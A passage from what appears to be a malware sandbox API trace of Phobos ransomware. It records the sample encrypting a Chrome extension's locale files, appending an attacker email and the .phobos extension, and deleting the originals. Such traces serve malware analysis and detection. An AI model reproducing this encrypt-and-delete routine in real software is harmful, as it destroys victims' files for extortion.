dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.306] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=673) returned 1 [0157.306] CloseHandle (hObject=0x130) returned 1 [0157.306] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json")) returned 0x2020 [0157.313] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.313] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.313] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.314] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.314] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.314] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2a1, lpOverlapped=0x0) returned 1 [0157.322] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b0, dwBufLen=0x2b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b0) returned 1 [0157.322] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2b0, lpOverlapped=0x0) returned 1 [0157.323] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0157.323] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.323] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.323] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0157.323] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.323] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.323] CloseHandle (hObject=0x130) returned 1 [0157.324] CloseHandle (hObject=0x134) returned 1 [0157.324] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json")) returned 1 [0157.325] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.325] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=708) returned 1 [0157.325] CloseHandle (hObject=0x134) returned 1 [0157.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json")) returned 0x2020 [0157.325] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.325] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.325] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.325] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.326] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.326] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.326] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2c4, lpOverlapped=0x0) returned 1 [0157.381] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d0, dwBufLen=0x2d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2d0) returned 1 [0157.381] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2d0, lpOverlapped=0x0) returned 1 [0157.382] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0157.382] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.382] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.382] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.382] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.382] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.382] CloseHandle (hObject=0x134) returned 1 [0157.382] CloseHandle (hObject=0x130) returned 1 [0157.382] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fr\\messages.json")) returned 1 [0157.383] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.383] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=941) returned 1 [0157.383] CloseHandle (hObject=0x130) returned 1 [0157.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json")) returned 0x2020 [0157.383] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.384] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.384] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.384] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.384] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.384] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3ad, lpOverlapped=0x0) returned 1 [0157.418] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3b0, dwBufLen=0x3b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3b0) returned 1 [0157.418] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3b0, lpOverlapped=0x0) returned 1 [0157.419] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32968) returned 1 [0157.419] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.419] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.419] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.419] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.420] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.420] CloseHandle (hObject=0x130) returned 1 [0157.420] CloseHandle (hObject=0x134) returned 1 [0157.420] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\messages.json")) returned 1 [0157.421] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.423] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=633) returned 1 [0157.423] CloseHandle (hObject=0x134) returned 1 [0157.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json")) returned 0x2020 [0157.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0157.423] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.423] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0157.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.424] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0157.424] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.424] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x279, lpOverlapped=0x0) returned 1 [0157.484] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x280, dwBufLen=0x280 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x280) returned 1 [0157.484] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x280, lpOverlapped=0x0) returned 1 [0157.484] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0157.484] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0157.484] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0157.484] CryptDestroyKey (hKey=0xa32d68) returned 1 [0157.484] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0157.485] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0157.485] CloseHandle (hObject=0x134) returned 1 [0157.485] CloseHandle (hObject=0x130) returned 1 [0157.485] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json")) returned 1 [0157.486] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0157.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0157.488] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=617) returned 1 [0157.488] CloseHandle (hObject=0x130) returned 1 [0157.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json")) returned 0x2020 [0157.488] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0157.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 